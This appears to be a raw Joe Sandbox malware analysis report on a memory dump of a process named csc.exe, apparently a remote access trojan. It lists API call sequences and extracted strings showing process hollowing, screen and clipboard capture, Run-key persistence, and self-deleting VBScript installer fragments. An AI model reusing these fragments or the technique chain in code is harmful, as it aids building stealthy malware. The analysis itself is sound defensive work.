                                      • GetCurrentProcess.KERNEL32(?,?,0044078B,?), ref: 004407D6
                                      • TerminateProcess.KERNEL32(00000000,?,0044078B,?), ref: 004407DD
                                      • ExitProcess.KERNEL32 ref: 004407EF
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                      • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                      • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                      • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                                      APIs
                                      • OpenClipboard.USER32(00000000), ref: 0040A65D
                                      • GetClipboardData.USER32(0000000D), ref: 0040A669
                                      • CloseClipboard.USER32 ref: 0040A671
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseDataOpen
                                      • String ID:
                                      • API String ID: 2058664381-0
                                      • Opcode ID: 140e067e8e587c8f59734ee57390a502f7d095b2261bbfc11f09a6f017fc4507
                                      • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                                      • Opcode Fuzzy Hash: 140e067e8e587c8f59734ee57390a502f7d095b2261bbfc11f09a6f017fc4507
                                      • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FeaturePresentProcessor
                                      • String ID: P@
                                      • API String ID: 2325560087-676759640
                                      • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                      • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                      • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                      • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                                      • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                                      • Opcode Fuzzy Hash: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                                      • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: GetLocaleInfoEx
                                      • API String ID: 2299586839-2904428671
                                      • Opcode ID: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                      • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                                      • Opcode Fuzzy Hash: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                      • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNextsend
                                      • String ID:
                                      • API String ID: 4113138495-0
                                      • Opcode ID: df9fd184b05af3bea60d38e113cbd403801ae8631a41ea3bca5d7b2bea2ce283
                                      • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                                      • Opcode Fuzzy Hash: df9fd184b05af3bea60d38e113cbd403801ae8631a41ea3bca5d7b2bea2ce283
                                      • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                      • String ID:
                                      • API String ID: 1663032902-0
                                      • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                      • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                                      • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                      • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                      • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                      • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                                      • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                      • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$InfoLocale_abort_free
                                      • String ID:
                                      • API String ID: 2692324296-0
                                      • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                      • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                                      • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                      • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                      • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                      • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                                      • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                      • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                                      APIs
                                        • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(-0006A42D,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                      • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                      • String ID:
                                      • API String ID: 1272433827-0
                                      • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                      • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                                      • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                      • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                      • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                      • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                                      • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                      • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                                      APIs
                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0
                                      • Opcode ID: 7bc4823d4125eefc11c0bf4c413f8d2ee48cbd7ba6f22e3d5f25b7b09068aca4
                                      • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                                      • Opcode Fuzzy Hash: 7bc4823d4125eefc11c0bf4c413f8d2ee48cbd7ba6f22e3d5f25b7b09068aca4
                                      • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                      • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                      • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                      • Instruction Fuzzy Hash:
                                      APIs
                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                        • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                      • DeleteDC.GDI32(00000000), ref: 00416F32
                                      • DeleteDC.GDI32(00000000), ref: 00416F35
                                      • DeleteObject.GDI32(00000000), ref: 00416F38
                                      • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                      • DeleteDC.GDI32(00000000), ref: 00416F6A
                                      • DeleteDC.GDI32(00000000), ref: 00416F6D
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                      • GetIconInfo.USER32(?,?), ref: 00416FC5
                                      • DeleteObject.GDI32(?), ref: 00416FF4
                                      • DeleteObject.GDI32(?), ref: 00417001
                                      • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                      • DeleteDC.GDI32(?), ref: 0041713C
                                      • DeleteDC.GDI32(00000000), ref: 0041713F
                                      • DeleteObject.GDI32(00000000), ref: 00417142
                                      • GlobalFree.KERNEL32(?), ref: 0041714D
                                      • DeleteObject.GDI32(00000000), ref: 00417201
                                      • GlobalFree.KERNEL32(?), ref: 00417208
                                      • DeleteDC.GDI32(?), ref: 00417218
                                      • DeleteDC.GDI32(00000000), ref: 00417223
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                      • String ID: DISPLAY
                                      • API String ID: 479521175-865373369
                                      • Opcode ID: f4872e5e54956cb8a82cf9cfbe48a4ffd8cadd88bec2254309271a8e236c435d
                                      • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                      • Opcode Fuzzy Hash: f4872e5e54956cb8a82cf9cfbe48a4ffd8cadd88bec2254309271a8e236c435d
                                      • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                      • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                      • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                      • ResumeThread.KERNEL32(?), ref: 00416773
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                      • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                      • GetLastError.KERNEL32 ref: 004167B8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                      • API String ID: 4188446516-3035715614
                                      • Opcode ID: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                      • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                      • Opcode Fuzzy Hash: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                      • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                      APIs
                                        • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                        • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                        • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                        • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                        • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                        • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00469654,00000000,00000000,0040BFB7,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041A1BA
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                      • ExitProcess.KERNEL32 ref: 0040C389
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                      • API String ID: 1861856835-1953526029
                                      • Opcode ID: ac067e044096ae1f60114affad0e4cdf889ae867448c86cc86e4aa15a9ad510b
                                      • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                                      • Opcode Fuzzy Hash: ac067e044096ae1f60114affad0e4cdf889ae867448c86cc86e4aa15a9ad510b
                                      • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                      • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                      • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                      • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                      • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                      • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                        • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00469654,00000000,00000000,0040BFB7,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041A1BA
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                      • Sleep.KERNEL32(000001F4), ref: 004110E7
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                      • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                      • GetCurrentProcessId.KERNEL32 ref: 00411114
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                      • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                      • API String ID: 2649220323-71629269
                                      • Opcode ID: 283a1b8ecc9e5b1403811ca470cbb728d9d5c33fdf0318a28450909090ce6da7
                                      • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                      • Opcode Fuzzy Hash: 283a1b8ecc9e5b1403811ca470cbb728d9d5c33fdf0318a28450909090ce6da7
                                      • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                      APIs
                                      • _wcslen.LIBCMT ref: 0040B882
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                      • _wcslen.LIBCMT ref: 0040B968
                                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000000,00000000,00000000), ref: 0040B9E0
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                      • _wcslen.LIBCMT ref: 0040BA25
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                      • ExitProcess.KERNEL32 ref: 0040BC36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                      • String ID: """, 0$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                      • API String ID: 2743683619-523211219
